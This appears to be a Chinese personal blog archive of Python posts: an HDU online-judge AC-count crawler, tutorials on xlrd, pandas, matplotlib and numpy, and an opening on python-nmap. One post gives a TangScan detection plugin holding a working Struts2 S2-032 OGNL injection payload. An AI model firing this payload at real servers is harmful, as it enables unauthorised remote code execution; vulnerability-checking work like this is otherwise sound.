标签： python

Hduoj用户AC题数统计爬虫

2017年11月9日
python, 爬虫
没有评论

趁着前几天出去比赛的空余时间瞎写完了

一向写python都是现写现查库怎么用

写这个主要是为了班里统计方便，但现在应该用不上了2333

写的挺垃圾，也是第一次搞这个，因为库太好用了感觉自己写的也没啥水平哈哈

其中主要点是判断指定日期的做题AC数

用了下用户实时的提交页面

http://acm.hdu.edu.cn/status.php?first=&pid=&user=aaa&lang=0&status=0

1.爬下直到指定日期最后所有做题情况

2.判断时间是否符合,顺便学习了下datetime

因为日期是从前往后排所以大于当前日期的跳过，直到遇见最后日期跳出循环
需要注意的是：如果指定日期及之前这个用户没有答题记录，会造成死循环，所以要判断当前是否已经是最后一页；因为get参数里没有页数，所以判断first是否重复就ok。

3.判断是否ac

4.丢到dict

分享一下渣渣代码

# encoding=utf-8
import requests
import re
import xlrd
import xlwt
from bs4 import BeautifulSoup
import datetime


def save_mysql():
    """Placeholder (presumably for a future MySQL export); currently a no-op."""
    return None


def save_excel(users, Allsolved, pid, sum):
    book = xlwt.Workbook(encoding='utf-8')  # 表格初始化
    sheet1 = book.add_sheet('sheet1', cell_overwrite_ok=True)
    heads = ['ID', u'指定日期累计AC题数' + '(' + start + 'to' + end + ')', u'总共已AC题数', u'指定日期AC题号']
    print u'\n准备将数据存入表格...'
    ii = 0  # 表格初始化用
    for head in heads:
        sheet1.write(0, ii, head)
        ii += 1
    ID_col = 0
    weekid = 3
    week_solved_col = 1
    solved_col = 2
    row = 1
    sheet1.col(week_solved_col).width = 256 * 20
    for user in users:
        sheet1.write(row, ID_col, user)
        row += 1
    row = 1
    for solved in Allsolved:
        sheet1.write(row, solved_col, solved)
        row += 1
    row = 1
    for wid in pid:
        sheet1.write(row, weekid, wid)
        row += 1
    row = 1
    for wsum in sum:
        sheet1.write(row, week_solved_col, wsum)
        row += 1
    book.save('Acm' + start + 'to' + end + '.xls')
    print u'\n录入成功！'


def run(users):
    All_Solved = []
    ID = []
    SUM = []
    for user in users:
        ########目前已做总题数
        userpages = requests.get("http://acm.hdu.edu.cn/userstatus.php?user=" + user)
        n = re.compile(r'>(.*)</h1>')
        s = re.compile(r'Solved</td><td align=center>([0-9]+)<')
        name = n.search(userpages.text)
        solved = s.search(userpages.text)

        print name.group(1) + " " + solved.group(1)
        All_Solved.append(solved.group(1))
        ########每日统计
        sum = 0
        print user
        first = '99999999'
        run_forever = True
        repid = ['|']  # 防止重复+统计题号
        while run_forever:
            req = requests.get(
                "http://acm.hdu.edu.cn/status.php?first=" + first + "&pid=&user=" + user + "&lang=0&status=0")
            soup = BeautifulSoup(req.text, 'lxml')
            tables = soup.findAll('table')
            tab = tables[3]
            old = []
            new = []
            dict = {'Runid': '123', 'Subtime': '2017', 'Status': 'ac', 'Id': '123'}
            for tr in tab.findAll('tr')[1:]:
                i = 1
                for td in tr.findAll('td')[:4]:
                    if i == 1:
                        dict['Runid'] = td.getText()
                        Runid = td.getText()
                    elif i == 2:
                        dict['Subtime'] = td.getText()
                    elif i == 3:
                        dict['Status'] = td.getText()
                    else:
                        dict['Id'] = td.getText()
                    i += 1
                old.append(dict.copy())
            if first == str(int(Runid) - 1):  # 防止当这个用户这个时间段没做过题的情况(死循环)
                break
            for AoW in old:
                time = datetime.datetime.strptime(AoW['Subtime'][0:-9], '%Y-%m-%d')
                if time <= d2 and time >= d1:
                    ac = 'Accepted'
                    # print AoW
                    if AoW['Status'] == ac:
                        for cfid in repid:
                            if AoW['Id'] != cfid:
                                f = 1
                                # T.append(AoW['Id'])
                            else:  # 如果重复 退出循环
                                f = 0
                                break
                        if f == 1:
                            repid.append(AoW['Id'])  # 防止重复
                            repid.append(' ')
                            new.append(AoW)
                elif time < d1:
                    run_forever = False
                    # break
                else:
                    pass

            ####
            for tt in new:
                print tt
            sum += len(new)

            first = str(int(Runid) - 1)  # 最后一个

        print '------'
        print sum
        print '------'
        ID.append(repid)
        SUM.append(sum)
        # print ID
        # print SUM
        # print SUM
    save_excel(users, All_Solved, ID, SUM)


def main():
    # 读入userID
    book = xlrd.open_workbook('./acmid.xlsx')
    sheet = book.sheet_by_name('sheet1')
    users = sheet.col_values(0)
    print users
    run(users)


if __name__ == '__main__':
    print '日期输入格式：年-月-日'
    start = raw_input("起始日期：")
    end = raw_input("终止日期：")
    d1 = datetime.datetime.strptime(start, '%Y-%m-%d')
    d2 = datetime.datetime.strptime(end, '%Y-%m-%d')
    main()

xlrd基本操作并配合matplotlib绘图笔记

2017年8月3日
matplotlib, python, xlrd
没有评论

一个简单的小例子快速了解如何利用xlrd读取excel并借助plt绘图

//之前代码有误，导致上图显示女生数量与男生一样，代码已改正

#encoding=utf-8
import xlrd
import matplotlib.pylab as plt
from pylab import *
def main():
    book=xlrd.open_workbook('./pdtest.xlsx')
    sheet_name = book.sheet_names()[0]#获得指定索引的sheet名字
    print sheet_name
    sheet=book.sheet_by_name('sheet1')
    rows=sheet.nrows#行数
    cols=sheet.ncols#列数
    print rows,cols
    row_data=sheet.row_values(0)
    col_data=sheet.col_values(0)
    print row_data,col_data
    cell=sheet.cell_value(1,2)
    print cell
    for i in range(rows):#每行数据
        print sheet.row_values(i)
    col1=sheet.col_values(1)[1:]#去掉列名称 打印指定列
    print col1
    k = 0
    for i in col1:
        print int(i)
        if int(i)==int('2'):
            k+=1
    print k
    book1=xlrd.open_workbook('./reg.xls')
    #sheet_name1=book1.sheet_names()[0]
    #print sheet_name1
    list=book1.sheets()[0]
    nrows=list.nrows
    print nrows
    print "------------------"
    col2=list.col_values(4)[1:]
    g = 0
    b = 0
    for i in col2:
        if i == u"\u5973":
            g=g+1

        if i == u"\u7537":
            b+=1

    print g,b

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    plt.figure(1)
    plt.bar(left=0,height=b,width=0.35,align="center",color="b",label="boy")
    plt.bar(left=0.5,height=g,width=0.35,align="center",color="y",label="girl")
    plt.title(u"2017太原市中考性别分布[柱状图]")
    plt.xlabel(u"性别")
    plt.ylabel(u"人数")
    plt.xticks((0, 0.5), (u"男", u"女"))
    plt.text(0, b+0.05, "%d" % b, ha="center", va="bottom")
    plt.text(0.5, g+0.05, "%d" % g, ha="center", va="bottom")
    #图中有误，之前把代码里面的参数g写成了b
    #plt.legend(loc="upper left")
    plt.show()


# Run the demo only when this file is executed as a script.
if __name__ == '__main__':
    main()

output:

sheet1
5 3
[u'', u'man', u'woman'] [u'', u'a', u'b', u'c', u'd']
1.0
[u'', u'man', u'woman']
[u'a', 2.0, 1.0]
[u'b', 6.0, 3.0]
[u'c', 2.0, 4.0]
[u'd', 1.0, 6.0]
[2.0, 6.0, 2.0, 1.0]
2
6
2
1
2
41609
------------------
20445 21163

Pandas基本操作笔记

2017年8月1日
pandas, python
没有评论

Python Data Analysis Library 或 pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。Pandas 纳入了大量库和一些标准的数据模型，提供了高效地操作大型数据集所需的工具。pandas提供了大量能使我们快速便捷地处理数据的函数和方法。你很快就会发现，它是使Python成为强大而高效的数据分析环境的重要因素之一。

#encoding=utf-8
import numpy as np
import pandas as pd
def main():
    """Walk through basic pandas DataFrame operations, printing each result."""
    #Build the tables
    dates=pd.date_range("20170801",periods=8)
    df=pd.DataFrame(np.random.randn(8,5),index=dates,columns=list("ABCDE"))#8x5 frame of random values, indexed by date, columns A-E
    print df
    dff=pd.DataFrame({"A":np.random.randint(1,10,8),"B":pd.date_range("20170707",periods=8)})
    print dff

    #Basic operations
    print df.head(3)#first three rows
    print df.tail(3)#last three rows
    print df.index
    print df.values
    print df.T#transpose
    print df.sort_values("C")#sort by column C, ascending
    print df.sort_index(axis=1,ascending=False)#sort by column labels, descending
    print df.describe()#summary statistics
    print df["A"]#select column A
    print df[:3]
    print df["20170801":"20170806"]
    print df.loc[dates[0]]
    print df.loc["20170802":"20170806",["B","D"]]
    print df.at[dates[0],"C"]
    print df.iloc[1:3,2:4]
    print df.iloc[1,4]#2nd row, 5th column
    print df[df.B>0]
    print df[df<0]
    print df[df["E"].isin([1,2])]

    #Basic assignment
    sl=pd.Series(list(range(10,18)),index=pd.date_range("20170801",periods=8))
    print sl
    df["F"]=sl
    print df
    df.at[dates[0],"A"]=0
    print df
    df.iat[1,4]=666
    df.loc[:,"D"]=np.array([4]*len(df))
    print df
    df2=df.copy()#copy, so df itself is left untouched below
    df2[df2<0]=-df2#flip negative values to positive
    print df2


# Run the demo only when this file is executed as a script.
if __name__ == '__main__':
    main()

output:

                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
   A          B
0  9 2017-07-07
1  3 2017-07-08
2  3 2017-07-09
3  6 2017-07-10
4  6 2017-07-11
5  4 2017-07-12
6  5 2017-07-13
7  6 2017-07-14
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
DatetimeIndex(['2017-08-01', '2017-08-02', '2017-08-03', '2017-08-04',
               '2017-08-05', '2017-08-06', '2017-08-07', '2017-08-08'],
              dtype='datetime64[ns]', freq='D')
[[ 1.07524464 -0.60505755  0.71275536  2.41815902 -0.02894002]
 [-1.51331977 -0.51708246  1.36323759  0.6185221  -0.45040032]
 [-2.26771071 -2.23593917  2.28891947  2.60836214 -1.1816333 ]
 [-0.27608484 -1.13021474 -0.12282251 -0.54247504 -0.33188383]
 [-0.23136532 -0.48824379  1.75736371 -0.96758439 -1.44857541]
 [ 0.37751303  0.05175454  0.32217176 -0.46223914  0.82356261]
 [ 1.00914409 -0.67055311  0.26280966 -0.86527427 -0.72155023]
 [-0.25735124  0.98478455 -0.29728085 -0.23039814  0.69747694]]
   2017-08-01  2017-08-02  2017-08-03  2017-08-04  2017-08-05  2017-08-06  \
A    1.075245   -1.513320   -2.267711   -0.276085   -0.231365    0.377513   
B   -0.605058   -0.517082   -2.235939   -1.130215   -0.488244    0.051755   
C    0.712755    1.363238    2.288919   -0.122823    1.757364    0.322172   
D    2.418159    0.618522    2.608362   -0.542475   -0.967584   -0.462239   
E   -0.028940   -0.450400   -1.181633   -0.331884   -1.448575    0.823563   

   2017-08-07  2017-08-08  
A    1.009144   -0.257351  
B   -0.670553    0.984785  
C    0.262810   -0.297281  
D   -0.865274   -0.230398  
E   -0.721550    0.697477  
                   A         B         C         D         E
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   E         D         C         B         A
2017-08-01 -0.028940  2.418159  0.712755 -0.605058  1.075245
2017-08-02 -0.450400  0.618522  1.363238 -0.517082 -1.513320
2017-08-03 -1.181633  2.608362  2.288919 -2.235939 -2.267711
2017-08-04 -0.331884 -0.542475 -0.122823 -1.130215 -0.276085
2017-08-05 -1.448575 -0.967584  1.757364 -0.488244 -0.231365
2017-08-06  0.823563 -0.462239  0.322172  0.051755  0.377513
2017-08-07 -0.721550 -0.865274  0.262810 -0.670553  1.009144
2017-08-08  0.697477 -0.230398 -0.297281  0.984785 -0.257351
              A         B         C         D         E
count  8.000000  8.000000  8.000000  8.000000  8.000000
mean  -0.260491 -0.576319  0.785894  0.322134 -0.330243
std    1.158991  0.919133  0.928070  1.436732  0.812523
min   -2.267711 -2.235939 -0.297281 -0.967584 -1.448575
25%   -0.585394 -0.785469  0.166402 -0.623175 -0.836571
50%   -0.244358 -0.561070  0.517464 -0.346319 -0.391142
75%    0.535421 -0.353244  1.461769  1.068431  0.152664
max    1.075245  0.984785  2.288919  2.608362  0.823563
2017-08-01    1.075245
2017-08-02   -1.513320
2017-08-03   -2.267711
2017-08-04   -0.276085
2017-08-05   -0.231365
2017-08-06    0.377513
2017-08-07    1.009144
2017-08-08   -0.257351
Freq: D, Name: A, dtype: float64
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
A    1.075245
B   -0.605058
C    0.712755
D    2.418159
E   -0.028940
Name: 2017-08-01 00:00:00, dtype: float64
                   B         D
2017-08-02 -0.517082  0.618522
2017-08-03 -2.235939  2.608362
2017-08-04 -1.130215 -0.542475
2017-08-05 -0.488244 -0.967584
2017-08-06  0.051755 -0.462239
0.71275536229
                   C         D
2017-08-02  1.363238  0.618522
2017-08-03  2.288919  2.608362
-0.45040032497
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
                   A         B         C         D         E
2017-08-01       NaN -0.605058       NaN       NaN -0.028940
2017-08-02 -1.513320 -0.517082       NaN       NaN -0.450400
2017-08-03 -2.267711 -2.235939       NaN       NaN -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244       NaN -0.967584 -1.448575
2017-08-06       NaN       NaN       NaN -0.462239       NaN
2017-08-07       NaN -0.670553       NaN -0.865274 -0.721550
2017-08-08 -0.257351       NaN -0.297281 -0.230398       NaN
Empty DataFrame
Columns: [A, B, C, D, E]
Index: []
2017-08-01    10
2017-08-02    11
2017-08-03    12
2017-08-04    13
2017-08-05    14
2017-08-06    15
2017-08-07    16
2017-08-08    17
Freq: D, dtype: int64
                   A         B         C         D         E   F
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C         D         E   F
2017-08-01  0.000000 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000 -0.605058  0.712755  4   -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  4  666.000000  11
2017-08-03 -2.267711 -2.235939  2.288919  4   -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823  4   -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364  4   -1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144 -0.670553  0.262810  4   -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281  4    0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000  0.605058  0.712755  4    0.028940  10
2017-08-02  1.513320  0.517082  1.363238  4  666.000000  11
2017-08-03  2.267711  2.235939  2.288919  4    1.181633  12
2017-08-04  0.276085  1.130215  0.122823  4    0.331884  13
2017-08-05  0.231365  0.488244  1.757364  4    1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144  0.670553  0.262810  4    0.721550  16
2017-08-08  0.257351  0.984785  0.297281  4    0.697477  17

Matplotlib基本图形笔记

2017年7月28日
matplotlib, python
没有评论

#encoding=utf-8
import matplotlib.pyplot as plt
import numpy as np



#Scatter plot
fig=plt.figure()#the canvas
ax=fig.add_subplot(3,2,1)#3 rows x 2 columns grid, first cell
n=128
X=np.random.normal(0,1,n)#n normally distributed samples; np.random.normal(loc=0.0, scale=1.0, size=None): loc -> mean (centre of the distribution), scale -> standard deviation (larger = wider and flatter), size -> output shape (None returns a single value)
Y=np.random.normal(0,1,n)
T=np.arctan2(X,Y)
#print X,Y,T
#plt.axes([0.025,0.025,0.95,0.95])#set the plotting area: axes([x,y,xs,ys]) where x,y are the position and xs,ys the extent to the right and upwards
ax.scatter(X,Y,s=75,c=T,alpha=0.5)#scatter plot: marker size, colour values, transparency
plt.xlim(-1.5,1.5),plt.xticks([])#x-axis range; no tick marks
plt.ylim(-1.5,1.5),plt.yticks([])
plt.axis()#with no arguments this only returns the current axis limits
plt.title("scatter")
plt.xlabel("x")
plt.ylabel("y")


#Bar chart
ax=fig.add_subplot(322)
n=10
X=np.arange(n)
Y1=(1-X/float(n+1))
Y2=(1-X/float(n))
#print X,Y1,Y2
ax.bar(X,+Y1,facecolor="#9999FF",edgecolor="white")
ax.bar(X,-Y2,facecolor="#FF2222",edgecolor="white")
for x,y in zip(X,Y1):
    #rotation is given as a number: the string "45" is rejected by current matplotlib, which accepts only a number, "horizontal" or "vertical"
    plt.text(x+0.1,+y+0.05,"%.2f"%y,ha="center",va="bottom",rotation=45)#va="bottom": the label sits above the bar top
for x,y in zip(X,Y2):
    plt.text(x+0.1,-y-0.05,"%.2f"%y,ha="center",va="top")
plt.title("bar")
plt.yticks([])
plt.xticks([])



#Pie chart
ax=fig.add_subplot(323)
n=20
Z=np.ones(n)
Z[-1]*=2
ax.pie(Z,explode=Z*0.05,colors=["%f"%(i/float(n)) for i in range(n)],labels=["%.2f"%(i/float(n)) for i in range(n)])
plt.gca().set_aspect("equal")
plt.xticks([])
plt.yticks([])
plt.title("pie")


#Polar plot
fig.add_subplot(324,polar=True)
n=20
t=np.arange(0.0,2*np.pi,2*np.pi/n)
r=10*np.random.rand(n)
plt.polar(t,r)
plt.title("polar")



#3D
from mpl_toolkits.mplot3d import Axes3D
fig.add_subplot(313,projection="3d")
plt.plot([1,3,5,6,7,9],[4,2,2,1,2,3],[6,8,8,7,8,2],linestyle="-.")
plt.title("3D")



#plt.savefig("./fig.png")#save to file
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)#extra padding around the figure edge and between subplots, in units of the font size
plt.show()

matplotlib基本绘图笔记

2017年7月23日
matplotlib, python
没有评论

matplotlib基本绘图笔记，跟我一起来绘制一个丑陋的三角函数图吧！

#encoding=utf-8

import numpy as np
import matplotlib.pyplot as plt


#Basic plot setup
x=np.linspace(-np.pi,np.pi,256,endpoint=True)#256 points from -pi to pi; endpoint=True includes the last point
c,s=np.cos(x),np.sin(x)
plt.figure(1)#select figure 1
plt.plot(x,c,color="blue",linewidth=1.5,linestyle="-",label="cos",alpha=0.5)#plot (x values, y values, colour, line width, line style, legend label, transparency)
plt.plot(x,s,"r*",label="sin")#"r" -> red, "*" -> star markers
plt.title("testruilin cos sin")#title


#Axes
ax=plt.gca()#the current axes object
ax.spines["right"].set_color("none")#hide the right spine
ax.spines["top"].set_color("none")
ax.spines["left"].set_position(("data",0))#move the left spine to data coordinate 0
ax.spines["bottom"].set_position(("data",0))


#Tick labels
ax.xaxis.set_ticks_position("bottom")#put the x ticks below the x axis
ax.yaxis.set_ticks_position("left")
plt.yticks(np.linspace(-1,1,5,endpoint=True))#5 ticks from -1 to 1
plt.xlim(-5,5)#x range
for label in ax.get_xticklabels()+ax.get_yticklabels():#font settings for every tick label
    label.set_fontsize(18)
    label.set_bbox(dict(facecolor="white",edgecolor="black",alpha=0.3))


#Miscellaneous
plt.grid()#grid lines
plt.legend(loc="upper left")#legend position
#plt.axis([-1,2,0.5,1])#visible range
plt.fill_between(x,np.abs(x)<0.8,c,c>0.1,color="green",alpha=0.4)#fill_between(x, y1, y2, where): y1 is the boolean |x|<0.8 (1 inside, 0 outside), y2 is cos(x); the area between them is filled only where cos(x)>0.1


#Annotation
t=1
plt.plot([t,t],[0,np.cos(t)],"y",linewidth=2.2,linestyle="--")#dashed line joining (t,0) and (t,cos(t))
plt.annotate("cos(1)",xy=(t,np.cos(t)),xycoords="data",xytext=(+10,+30),textcoords="offset points",arrowprops=dict(arrowstyle="->",connectionstyle="arc3,rad=0.3"))
#annotate: xy is the annotated point in data coordinates; xytext=(+10,+30) with textcoords="offset points" places the text at an offset relative to that point; arrowprops sets the arrow style and its curvature



plt.show()#display the figure

numpy常用操作笔记

2017年7月21日
numpy, python
没有评论

#encoding=utf-8
import numpy as np

lst=[[1,2,3],[6,7,8]]
print (type(lst))
np_lst=np.array(lst)
print (type(np_lst))
#np.float was only an alias of the builtin float and has been removed from NumPy; dtype=float yields the same float64 array
np_lst=np.array(lst,dtype=float)
print (np_lst)
print (np_lst.shape)#(rows, columns)
print (np_lst.ndim)#number of dimensions
print (np_lst.dtype)#element type
print (np_lst.itemsize)#bytes per element
print (np_lst.size)#number of elements

print (np.zeros([2,4]))#array filled with zeros
print (np.ones([3,2]))
print (np.random.rand())#one random number
print (np.random.rand(2,4))
print (np.random.randint(1,10,3))#three random integers in [1, 10) - the upper bound is exclusive
print (np.random.choice([1,2,3,5,10,100,666]))#pick one of the given values
print (np.random.beta(1,10,100))#100 samples from a beta distribution

print (np.arange(1,11).reshape([2,-1]))#1..10 reshaped to 2 rows (5 columns inferred)

#named cube rather than `list`, which shadowed the builtin for the rest of the script
cube=np.array([[[1,2,3],
               [4,5,6]],
              [[7,8,9],
               [10,11,12]]
              ])
print (cube.sum(axis=0))#sum over the outermost axis: 1+7 2+8 3+9 4+10 5+11 6+12
print (cube.sum(axis=1))#sum over the middle axis: 1+4 2+5 3+6 7+10 8+11 9+12
print (cube.sum(axis=2))#sum over the innermost axis: 1+2+3 4+5+6 7+8+9 10+11+12
print (cube.max(axis=1))#maximum along axis 1
print (cube.min(axis=2))#minimum along axis 2

lst1=np.array([1,2,3])
lst2=np.array([10,11,12])
print (np.concatenate((lst1,lst2),axis=0))#join end to end
print (np.vstack((lst1,lst2)))#stack vertically: two rows
print (np.hstack((lst1,lst2)))#stack horizontally: one row
print (np.split(lst1,3))#split into 3 parts

output:

<type 'list'>
<type 'numpy.ndarray'>
[[ 1.  2.  3.]
 [ 6.  7.  8.]]
(2, 3)
2
float64
8
6
[[ 0.  0.  0.  0.]
 [ 0.  0.  0.  0.]]
[[ 1.  1.]
 [ 1.  1.]
 [ 1.  1.]]
0.0790300286594
[[ 0.40570725  0.40072322  0.75697423  0.45873189]
 [ 0.84684053  0.80063956  0.02231413  0.57768334]]
[4 5 8]
10
[  1.98939407e-02   1.61285413e-02   1.18716706e-02   8.10961771e-02
   1.63533368e-01   1.44668421e-01   5.11693434e-02   6.59941834e-02
   2.23286959e-02   2.15972016e-01   8.63734013e-02   8.06557908e-02
   1.22880147e-01   1.09686347e-02   6.54980124e-02   1.98280109e-03
   4.08960959e-05   4.99724974e-02   4.46814021e-02   1.38706779e-01
   1.24582838e-01   5.32977093e-02   1.01838024e-01   2.46115301e-01
   6.15260218e-03   1.08537025e-01   1.69927681e-02   1.03185373e-01
   2.02785750e-02   4.68360049e-02   2.35353598e-02   1.53166093e-01
   7.08847154e-02   1.43549143e-02   9.55657510e-02   7.62737256e-02
   5.94670869e-03   5.71465328e-03   3.98867568e-02   6.37016822e-02
   9.69537649e-02   3.52414465e-02   5.60588196e-03   1.45640846e-01
   3.06005428e-02   7.66577878e-02   1.98901419e-02   1.04611224e-01
   1.45486287e-02   4.63747783e-03   1.00559794e-01   4.14864166e-02
   6.97617286e-02   1.21598675e-02   5.18675502e-02   2.67329995e-01
   2.71693357e-01   7.61304550e-02   7.19672528e-02   6.30126936e-03
   3.79026503e-02   2.35909430e-01   5.86051618e-02   2.11428839e-01
   1.35133707e-01   6.62907241e-02   1.38296699e-01   2.88886522e-01
   2.40987292e-02   1.76062934e-02   1.90230382e-01   2.09219429e-01
   3.40778112e-02   4.66014797e-02   5.47428038e-03   2.20511410e-02
   3.19067152e-02   2.47324231e-02   3.66452719e-02   2.97249683e-02
   2.26196050e-01   1.59556704e-02   5.66573658e-04   1.44624707e-01
   8.91173413e-02   4.21186597e-02   3.77105859e-03   2.68561111e-01
   1.88337068e-02   1.12529504e-01   1.14325549e-01   6.22131659e-04
   4.74532828e-01   1.57684391e-01   2.60435883e-02   1.53169399e-03
   2.44662204e-02   2.86626061e-02   1.47198619e-01   4.32705246e-02]
[[ 1  2  3  4  5]
 [ 6  7  8  9 10]]
[[ 8 10 12]
 [14 16 18]]
[[ 5  7  9]
 [17 19 21]]
[[ 6 15]
 [24 33]]
[[ 4  5  6]
 [10 11 12]]
[[ 1  4]
 [ 7 10]]
[ 1  2  3 10 11 12]
[[ 1  2  3]
 [10 11 12]]
[ 1  2  3 10 11 12]
[array([1]), array([2]), array([3])]

S2-032 远程命令执行 (POC@Tangscan)

2016年5月6日
POC, python, Tangscan
没有评论

前段时间很火的S2-032 远程命令执行

import re
import string
from StringIO import StringIO
from thirdparty import requests
from modules.exploit import TSExploit
from StringIO import StringIO

class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "S2-032 远程命令执行",
            "product": "",
            "product_version": "",
            "desc": """
            S2-032 远程命令执行
            """,
            "license": self.license.TS,
            "author": ["系统"],
            "ref": [
                {self.ref.wooyun: "http://zone.wooyun.org/content/26856"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def verify(self):
        exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
        try:
            r = requests.get(exp_url)
            content = r.content
        except:
            content = ''
        if content.find('88888887') == 0:
            self.result.status = True
            self.result.description = "目标 {url} 存在st2命令执行".format(
            url=self.option.url
        )
        else:
            try:
                headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
                data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"}
                files = {'test': ('1.jpg', StringIO('1'))}
                req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare()
                
                req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj')
                req.headers['Content-Length'] = len(req.body)
                s = requests.Session()
                reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)

                if reponse.content.find('88888887') == 0:
                    self.result.status = True
                    self.result.description = "目标 {url} 存在st2命令执行".format(
                    url=self.option.url
                )
                
                
            except Exception,e:
                print str(e)
    def exploit(self):
        pass

if __name__ == '__main__':
    # Pass a plugin instance to main() from the project-local modules.main
    # (presumably the framework's command-line runner - confirm).
    from modules.main import main
    main(TangScan())

0x01 About

大家都比较熟悉nmap，nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。

今天分享一下python-nmap，是python的一个模块库，使用这个模块可以让python很方便的操作nmap扫描器来工作，它可以帮助管理员完成自动扫描任务和生成报告的工具，它还支持nmap的脚本输出。

python-nmap只提供了nmap中的端口扫描，但输出方式会让人便于信息整理。

前提：使用python-nmap你得先装有nmap该软件

